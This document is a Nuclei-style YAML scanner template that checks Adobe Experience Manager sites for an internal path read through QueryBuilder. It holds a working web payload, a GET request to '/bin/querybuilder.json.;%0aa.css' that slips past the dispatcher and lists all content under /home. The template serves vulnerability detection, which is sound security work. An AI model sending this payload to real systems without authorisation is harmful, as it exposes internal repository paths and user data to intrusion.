id: aem-querybuilder-internal-path-read1

info:
  author: DhiyaneshDk
  name: AEM QueryBuilder Internal Path Read
  severity: medium
  reference: https://speakerdeck.com/0ang3el/aem-hacker-approaching-adobe-experience-manager-webapps-in-bug-bounty-programs?slide=91
  tags: aem


requests:
  - raw:
      - |
        GET /bin/querybuilder.json.;%0aa.css?path=/home&p.hits=full&p.limit=-1 HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Accept-Encoding: gzip, deflate
        Accept: */*
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        words:
          - 'jcr:path'
          - 'success'
        condition: and